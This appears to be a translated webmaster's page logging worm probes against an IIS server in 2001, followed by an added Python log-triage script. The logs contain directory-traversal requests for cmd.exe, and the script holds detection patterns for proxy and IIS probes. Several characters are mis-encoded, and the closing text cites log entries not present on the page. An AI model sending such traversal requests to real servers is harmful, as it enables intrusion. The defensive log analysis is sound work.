2001/06/16 12:55:20 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/16 12:55:22 - GET /winnt/system32/cmd.exe 404

This also seems to be the usual worm (this one). According to the IP, it is an American telecommunications company. It is a subdomain, so is it a server inside the company or under its management? When I traced the route with tracert it did reach the other end, so there seems to be no doubt that it is a server. IP-to-domain lookups have not been working well lately, so I searched ARIN directly.

Source IP address : 210.204.185.1
2001/06/09 11:34:44 - GET /winnt/system32/cmd.exe 404
2001/06/09 11:34:44 - GET /winnt/system32/cmd.exe 404
2001/06/09 11:34:45 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/06/09 11:34:45 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/06/09 11:34:45 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/06/09 11:34:46 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/06/09 11:34:46 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/06/09 11:34:46 - GET /winnt/system32/cmd.exe 404
2001/06/09 11:34:48 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/06/09 11:34:48 - GET /winnt/system32/cmd.exe 404
2001/06/09 11:34:49 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/09 11:34:49 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/09 11:34:51 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/09 11:34:51 - GET /winnt/system32/cmd.exe 404

This is clearly an intrusion attempt targeting Windows NT/2000 + IIS. This is exactly the access sequence of the well-known worm. You can see that, unlike before, it is persistent. It is this one. In that case, does that mean the other side is Solaris?

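The operations themselves are not suspicious, so I will not post the log, but anonymous access over ftp only, and from Taiwan at that, is a little strange. Is it the work of an ftp search engine, or something else??
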
Source IP address : 217.81.171.41
2001/05/27 10:32:16 anonymous 21 [17]USER anonymous 331 0 0 0 - -
2001/05/27 10:32:16 guest@here.com 21 [17]PASS guest@here.com 230 0 0 80 - -
2001/05/27 10:32:19 guest@here.com 21 [17]MKD 010527123603p 550 0 0 0 - -
2001/05/27 10:32:26 guest@here.com 21 [17]MKD 010527123610p 550 0 0 0 - -

This is the first slightly suspicious ftp access. I cannot tell whether it is malicious. What do they intend to do by creating a directory anonymously? Are they trying to upload porn images, or upload a huge file to bring the server down..... Still, with traffic coming from a mysterious place, I wonder whether the server got registered in something like Altavista's ftp search.

06:59:32 202.100.13.11 GET /winnt/system32/cmd.exe 404

The same kind of attack is coming in again from yet another place. Is it the same kind of worm or robot after all?

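00:10:52 211.100.2.75 GET /winnt/system32/cmd.exe 404
00:10:54 211.100.2.75 GET /winnt/system32/cmd.exe 404
00:10:56 211.100.2.75 GET /scripts/..チ%pc../winnt/system32/cmd.exe 500

This appears to be an intrusion attempt targeting Windows NT/2000 + IIS. If the system is a default install, the web root is set to the root of the drive, and security is not set up properly, the first two lines are dangerous. The third line apparently targets an IIS security hole. If the patch is applied there is no problem. The behaviour resembles the well-known worm, but it gives up quickly, so it may be a different worm. For reference, see here as well.
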
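16:58:25 140.130.88.1 GET /winnt/system32/cmd.exe 404

This one is a single access only. Does that mean the other side is not the well-known worm but a different worm or robot, or perhaps manual access? In any case, it is quite suspicious.
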
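The request shapes collected on this page (SOCKS handshake bytes, CONNECT and absolute-URI proxy probes, empty requests, bursts of /cgi-bin/ misses, and IIS cmd.exe/root.exe and .ida requests) can be triaged mechanically from an Apache common-log-format file. The following Python script is an added example, not part of the original page; the sample lines are constructed after the entries above with documentation addresses and placeholder hostnames, and the label names and the scan threshold are assumptions.

```python
"""Triage probe traffic in an Apache common-log-format access log."""
import re
from collections import Counter, defaultdict

# host ident user [time] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample lines modelled on the entries shown on this page.
# Addresses are documentation ranges; hostnames are placeholders.
SAMPLE_LOG = r'''
192.0.2.10 - - [26/Feb/2003:16:15:11 +0900] "\x04\x01" 501 -
192.0.2.10 - - [26/Feb/2003:16:15:33 +0900] "\x05\x01" 501 -
192.0.2.10 - - [26/Feb/2003:16:15:35 +0900] "CONNECT mail.example.net:25 HTTP/1.1" 405 320
198.51.100.7 - - [23/Feb/2003:01:52:55 +0900] "GET http://www.example.com/ HTTP/1.1" 200 6471
198.51.100.7 - - [28/Feb/2003:11:01:51 +0900] "GET /(0024)http://www.example.org/ HTTP/1.0" 403 305
198.51.100.8 - - [23/Feb/2003:00:37:04 +0900] "-" 408 -
203.0.113.5 - - [10/Apr/2003:21:12:02 +0900] "HEAD /cgi-bin/cart.pl HTTP/1.1" 404 0
203.0.113.5 - - [10/Apr/2003:21:12:12 +0900] "HEAD /cgi-bin/campas HTTP/1.1" 404 0
203.0.113.5 - - [10/Apr/2003:21:12:57 +0900] "HEAD /cgi-bin/bash HTTP/1.1" 404 0
203.0.113.5 - - [10/Apr/2003:21:14:37 +0900] "HEAD /Cgi-Bin/alibaba.pl HTTP/1.1" 404 0
203.0.113.9 - - [12/Jul/2003:18:21:27 +0900] "GET /default.ida HTTP/1.0" 404 290
203.0.113.9 - - [12/Jul/2003:18:21:30 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 300
203.0.113.20 - - [12/Jul/2003:18:30:00 +0900] "GET /index.html HTTP/1.1" 200 6471
'''.strip().splitlines()


def classify(request):
    """Label one logged request line; None means it looks ordinary."""
    if request == "-":
        return "empty-request"            # nothing parseable arrived (logged with 408)
    # Apache writes non-printable bytes as \xhh; 04 01 opens a SOCKS4 CONNECT,
    # 05 01 opens a SOCKS5 greeting offering one auth method.
    if request.startswith(("\\x04\\x01", "\\x05\\x01")):
        return "socks-probe"
    parts = request.split()
    if len(parts) < 2:
        return "malformed"
    method, target = parts[0].upper(), parts[1]
    if method == "CONNECT":
        return "connect-tunnel-probe"
    if "://" in target:                   # absolute URI, also when embedded in a path
        return "open-proxy-probe"
    path = target.split("?", 1)[0].lower()
    if path.endswith(("cmd.exe", "root.exe")):
        return "iis-cmd-probe"
    if path.endswith((".ida", ".idq")):
        return "iis-indexing-probe"
    return None


def analyse(lines, scan_threshold=3):
    """Summarise probes per client; scan_threshold is an assumed cut-off."""
    per_host = defaultdict(Counter)
    cgi_misses = defaultdict(set)         # distinct /cgi-bin/ paths answered 404
    connect_ports = Counter()
    needs_review = []                     # proxy-style requests answered with 2xx
    unparsed = 0
    for line in lines:
        m = CLF.match(line)
        if not m:
            unparsed += 1
            continue
        host, request, status = m["host"], m["request"], int(m["status"])
        label = classify(request)
        if label:
            per_host[host][label] += 1
        parts = request.split()
        if label == "connect-tunnel-probe":
            port = re.search(r":(\d+):?$", parts[1])   # tolerate "host:6667:"
            if port:
                connect_ports[int(port.group(1))] += 1
        if label in ("connect-tunnel-probe", "open-proxy-probe") and 200 <= status < 300:
            needs_review.append((host, request))
        if status == 404 and len(parts) >= 2 and parts[1].lower().startswith("/cgi-bin/"):
            cgi_misses[host].add(parts[1].lower())
    for host, paths in cgi_misses.items():
        if len(paths) >= scan_threshold:
            per_host[host]["cgi-scan"] = len(paths)
    return {
        "hosts": {h: dict(c) for h, c in per_host.items()},
        "connect_ports": dict(connect_ports),
        "needs_review": needs_review,
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for host, labels in sorted(report["hosts"].items()):
        print(host, labels)
    print("CONNECT ports:", report["connect_ports"])
    print("2xx answers to proxy probes:", report["needs_review"])
```

A 2xx answer to an absolute-URI request, like the 200 responses to `GET http://www.yahoo.com/` above, lands in `needs_review`; comparing the logged size with that of the local index page tells a locally served page apart from actual proxying.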